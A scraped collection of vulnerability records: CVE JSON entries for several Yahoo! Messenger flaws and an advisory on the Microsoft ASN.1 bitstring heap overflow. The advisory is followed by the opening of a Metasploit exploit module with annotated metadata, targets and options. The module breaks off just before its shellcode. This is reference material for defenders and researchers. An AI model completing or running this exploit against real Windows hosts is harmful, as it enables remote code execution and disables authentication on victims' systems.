      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2005-03-13T05:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20050308 Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
        },
        {
          "name": "12750",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/12750"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-0737",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo! Messenger allows remote attackers to execute arbitrary code via the offline mode."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20050308 Yahoo! Messenger Offline Mode Status Remote Buffer Overflow Vulnerability",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/lists/fulldisclosure/2005/Mar/0284.html"
            },
            {
              "name": "12750",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/12750"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-0737",
    "datePublished": "2005-03-13T05:00:00Z",
    "dateReserved": "2005-03-12T00:00:00Z",
    "dateUpdated": "2024-09-17T02:01:33.428Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2014-7216 (GCVE-0-2014-7216)
Vulnerability from cvelistv5
Published
2015-09-11 20:00
Modified
2024-08-06 12:40
Severity ?
CWE
  • n/a
Summary
Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file.
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-06T12:40:19.202Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "https://hackerone.com/reports/10767"
          },
          {
            "name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
          },
          {
            "name": "1033544",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id/1033544"
          },
          {
            "name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2015/Sep/24"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2015-09-03T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-09T18:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "https://hackerone.com/reports/10767"
        },
        {
          "name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
        },
        {
          "name": "1033544",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id/1033544"
        },
        {
          "name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://seclists.org/fulldisclosure/2015/Sep/24"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2014-7216",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Multiple stack-based buffer overflows in Yahoo! Messenger 11.5.0.228 and earlier allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) shortcut or (2) title keys in an emoticons.xml file."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/",
              "refsource": "MISC",
              "url": "https://www.rcesecurity.com/2015/09/cve-2014-7216-a-journey-through-yahoos-bug-bounty-program/"
            },
            {
              "name": "https://hackerone.com/reports/10767",
              "refsource": "MISC",
              "url": "https://hackerone.com/reports/10767"
            },
            {
              "name": "20150903 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/536390/100/0/threaded"
            },
            {
              "name": "1033544",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id/1033544"
            },
            {
              "name": "20150907 [CVE-2014-7216] Yahoo! Messenger emoticons.xml Multiple Key Value Handling Local Buffer Overflow",
              "refsource": "FULLDISC",
              "url": "http://seclists.org/fulldisclosure/2015/Sep/24"
            },
            {
              "name": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html",
              "refsource": "MISC",
              "url": "http://packetstormsecurity.com/files/133443/Yahoo-Messenger-11.5.0.228-Buffer-Overflow.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2014-7216",
    "datePublished": "2015-09-11T20:00:00",
    "dateReserved": "2014-09-28T00:00:00",
    "dateUpdated": "2024-08-06T12:40:19.202Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2006-3298 (GCVE-0-2006-3298)
Vulnerability from cvelistv5
Published
2006-06-29 01:00
Modified
2024-08-07 18:23
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll.
References
http://www.security.nnov.ru/Gnews281.html (x_refsource_MISC)
http://www.securityfocus.com/bid/18622 (vdb-entry, x_refsource_BID)
http://secunia.com/advisories/20773 (third-party-advisory, x_refsource_SECUNIA)
https://exchange.xforce.ibmcloud.com/vulnerabilities/27319 (vdb-entry, x_refsource_XF)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T18:23:21.162Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.security.nnov.ru/Gnews281.html"
          },
          {
            "name": "18622",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/18622"
          },
          {
            "name": "20773",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/20773"
          },
          {
            "name": "yahoo-messenger-nonascii-dos(27319)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-06-22T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-07-19T15:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.security.nnov.ru/Gnews281.html"
        },
        {
          "name": "18622",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/18622"
        },
        {
          "name": "20773",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/20773"
        },
        {
          "name": "yahoo-messenger-nonascii-dos(27319)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-3298",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger 7.5.0.814 and 7.0.438 allows remote attackers to cause a denial of service (crash) via messages that contain non-ASCII characters, which triggers the crash in jscript.dll."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.security.nnov.ru/Gnews281.html",
              "refsource": "MISC",
              "url": "http://www.security.nnov.ru/Gnews281.html"
            },
            {
              "name": "18622",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/18622"
            },
            {
              "name": "20773",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/20773"
            },
            {
              "name": "yahoo-messenger-nonascii-dos(27319)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/27319"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-3298",
    "datePublished": "2006-06-29T01:00:00",
    "dateReserved": "2006-06-28T00:00:00",
    "dateUpdated": "2024-08-07T18:23:21.162Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2006-5563 (GCVE-0-2006-5563)
Vulnerability from cvelistv5
Published
2006-10-27 16:00
Modified
2024-08-07 19:55
Severity ?
CWE
  • n/a
Summary
Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T19:55:53.391Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20061026 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
          },
          {
            "name": "22510",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/22510"
          },
          {
            "name": "20625",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/20625"
          },
          {
            "name": "20061024 Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_FULLDISC",
              "x_transferred"
            ],
            "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
          },
          {
            "name": "ADV-2006-4193",
            "tags": [
              "vdb-entry",
              "x_refsource_VUPEN",
              "x_transferred"
            ],
            "url": "http://www.vupen.com/english/advisories/2006/4193"
          },
          {
            "name": "20061025 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-10-24T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite.  NOTE: the provenance of this information is unknown; the details are obtained from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20061026 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
        },
        {
          "name": "22510",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/22510"
        },
        {
          "name": "20625",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/20625"
        },
        {
          "name": "20061024 Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_FULLDISC"
          ],
          "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
        },
        {
          "name": "ADV-2006-4193",
          "tags": [
            "vdb-entry",
            "x_refsource_VUPEN"
          ],
          "url": "http://www.vupen.com/english/advisories/2006/4193"
        },
        {
          "name": "20061025 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-5563",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Unspecified vulnerability in Yahoo! Messenger (Service 18) before 8.1.0.195 allows remote attackers to cause a denial of service (NULL dereference and application crash) via a crafted room name in a Conference Invite.  NOTE: the provenance of this information is unknown; the details are obtained from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20061026 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
              "refsource": "FULLDISC",
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0566.html"
            },
            {
              "name": "22510",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/22510"
            },
            {
              "name": "20625",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/20625"
            },
            {
              "name": "20061024 Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
              "refsource": "FULLDISC",
              "url": "http://archives.neohapsis.com/archives/fulldisclosure/2006-10/0518.html"
            },
            {
              "name": "ADV-2006-4193",
              "refsource": "VUPEN",
              "url": "http://www.vupen.com/english/advisories/2006/4193"
            },
            {
              "name": "20061025 Re: Yahoo! Messenger Service 18 Remote Buffer Overflow Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/449667/100/0/threaded"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-5563",
    "datePublished": "2006-10-27T16:00:00",
    "dateReserved": "2006-10-27T00:00:00",
    "dateUpdated": "2024-08-07T19:55:53.391Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2005-0243 (GCVE-0-2005-0243)
Vulnerability from cvelistv5
Published
2005-02-18 05:00
Modified
2024-08-07 21:05
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions.
References
http://secunia.com/advisories/13712 (third-party-advisory, x_refsource_SECUNIA)
http://secunia.com/secunia_research/2005-2/advisory/ (x_refsource_MISC)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T21:05:25.023Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "13712",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/13712"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2005-2/advisory/"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-02-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-06-15T16:38:02",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "13712",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/13712"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2005-2/advisory/"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-0243",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger 6.0.0.1750, and possibly other versions before 6.0.0.1921, does not properly display long filenames in file dialog boxes, which could allow remote attackers to trick users into downloading and executing programs via file names containing a large number of spaces and multiple file extensions."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "13712",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/13712"
            },
            {
              "name": "http://secunia.com/secunia_research/2005-2/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2005-2/advisory/"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-0243",
    "datePublished": "2005-02-18T05:00:00",
    "dateReserved": "2005-02-08T00:00:00",
    "dateUpdated": "2024-08-07T21:05:25.023Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

var-200403-0051
Vulnerability from variot

Multiple integer overflows in Microsoft ASN.1 library (MSASN1.DLL), as used in LSASS.EXE, CRYPT32.DLL, and other Microsoft executables and libraries on Windows NT 4.0, 2000, and XP, allow remote attackers to execute arbitrary code via ASN.1 BER encodings with (1) very large length fields that cause arbitrary heap data to be overwritten, or (2) modified bit strings. Microsoft Windows ASN.1 Library (msasn1.dll) has a vulnerability related to integer overflow. Because of this vulnerability, arbitrary code may be executed remotely. A remote third party may execute arbitrary code with SYSTEM privileges. As a result, it is possible to gain administrative privileges on vulnerable systems. The issue presents itself in the ASN.1 bit string decoding routines, specifically the BERDecBitString() function. The issue manifests when the affected function attempts to process a constructed bit string that contains another nested constructed bit string. This vulnerability is exposed in a number of security-related operating system components, including Kerberos (via UDP port 88), Microsoft IIS with SSL support enabled and NTLMv2 authentication (via TCP ports 135, 139 and 445). Other components may also be affected, though a comprehensive list is not available at this time. Client applications, which use the library, will be affected, including LSASS.EXE and CRYPT32.DLL (and any application that relies on CRYPT32.DLL). The vulnerable library is used frequently in components that handle certificates such as Internet Explorer and Outlook. Handling of signed ActiveX components could also present an exposure. It should be noted that because ASN.1 data will likely be encoded, for example Kerberos, SSL, IPSec or Base64 encoded, the malicious integer values may be obfuscated and as a result not easily detectable. 
Issues related to this vulnerability were originally covered in BID 9626 and 9743, further information has been made available which identifies that this is a distinct vulnerability in the library and so this specific issue has been assigned an individual BID. ** June 5, 2005 Update: An IRC bot style tool may be exploiting this vulnerability. This alert will be updated as further information becomes available. This issue is related to insufficient checking of data supplied via an externally supplied length field in ASN.1 BER encoded data. This could result in an excessive value being used in a heap allocation routine, allowing for large amounts of heap memory to be corrupted. This could be leveraged to corrupt sensitive values in memory, resulting in execution of arbitrary code. Exploitation of this issue will result in the corruption of heap based management structures, and may ultimately be leveraged by an attacker to have arbitrary code executed in the context of the affected process. ##

$Id$

This file is part of the Metasploit Framework and may be subject to

redistribution and commercial restrictions. Please see the Metasploit

Framework web site for more information on licensing and terms of use.

http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

include Msf::Exploit::Remote::SMB

# Registers the module with the framework: descriptive metadata, advisory
# references, payload limits, the single listed target, and one user-settable
# option (PROTO, default 'smb').
#
# info - Hash of caller-supplied metadata merged in through update_info
#        (defaults to an empty Hash).
#
# The 'Description' text doubles as an impact statement for triage: it says a
# failed attempt crashes the LSASS service and the host reboots itself in
# 60 seconds, and that after a successful attempt the host can no longer
# process authentication requests (SMB or console logins) until rebooted.
# The same text names MS04-007 as the patch that fixed the issue.
def initialize(info = {})
    super(update_info(info, 
        'Name'           => 'Microsoft ASN.1 Library Bitstring Heap Overflow',
        'Description'    => %q{
            This is an exploit for a previously undisclosed
            vulnerability in the bit string decoding code in the
            Microsoft ASN.1 library. Both vulnerabilities were fixed in the
            MS04-007 patch.

            You are only allowed one attempt with this vulnerability. If
            the payload fails to execute, the LSASS system service will
            crash and the target system will automatically reboot itself
            in 60 seconds. If the payload succeeeds, the system will no
            longer be able to process authentication requests, denying
            all attempts to login through SMB or at the console. A
            reboot is required to restore proper functioning of an
            exploited system.

            This exploit has been successfully tested with the win32/*/reverse_tcp
            payloads, however a few problems were encounted when using the
            equivalent bind payloads. Your mileage may vary.

        },
        'Author'         => [ 'Solar Eclipse <solareclipse@phreedom.org>' ],
        'License'        => GPL_LICENSE,
        'Version'        => '$Revision$',
        # Cross-references for the same issue: CVE, OSVDB, BID, the original
        # author's write-up, and the vendor bulletin (MS04-007).
        'References'     =>
            [
                [ 'CVE', '2003-0818'],
                [ 'OSVDB', '3902' ],
                [ 'BID', '9633'],
                [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'],
                [ 'MSB', 'MS04-007'],

            ],
        'DefaultOptions' =>
            {
                'EXITFUNC' => 'thread'
            },              
        # NOTE(review): presumably flags that the module deals with a privileged
        # service context; the exact framework meaning is not shown here.
        'Privileged'     => true,
        # NOTE(review): 'Space' looks like the payload size budget in bytes and
        # 'StackAdjustment' a stack offset applied for the payload; confirm
        # against the framework documentation.
        'Payload'        =>
            {
                'Space'    => 1024,
                'StackAdjustment' => -3500,
            },
        'Platform'       => 'win',
        # Only one target entry is defined; it names the affected OS range.
        'Targets'        => 
            [
                [ 
                    'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed)
                    {
                        'Platform' => 'win',
                    },
                ],
            ],
        'DisclosureDate' => 'Feb 10 2004',
        'DefaultTarget' => 0))

    # PROTO is a required string option; the help text lists http and smb,
    # and 'smb' is the default.
    register_options(
        [
            OptString.new('PROTO', [ true,  "Which protocol to use: http or smb", 'smb']),
        ], self.class)          
end

# This exploit is too destructive to use during automated exploitation. 
# Better Windows-based exploits exist at this time (Sep 2006)
def autofilter
    # Unconditionally answers false, which keeps this module out of
    # automated selection.
    return false
end

# This is a straight port of Solar Eclipse's "kill-bill" exploit, published
# as a Metasploit Framework module with his permission. This module is only
# licensed under GPLv2, keep this in mind if you embed the Framework into
# a non-GPL application. -hdm[at]metasploit.com

# Module entry point. Builds one SPNEGO token from the fixed first-stage byte
# string below plus the framework-encoded payload, then hands that token to
# the transport selected by the PROTO option ('smb' or 'http').
#
# Any other PROTO value only prints a status line; nothing is sent.
#
# NOTE(review): spnego_token returns nil when one of its input checks fails,
# and that return value is passed on to the transport method unchecked.
def exploit

    # The first stage shellcode fixes the PEB pointer and cleans the heap
    # (Opaque machine-code bytes; the line above is the only description of
    # them that this file gives.)
    stage0 = 
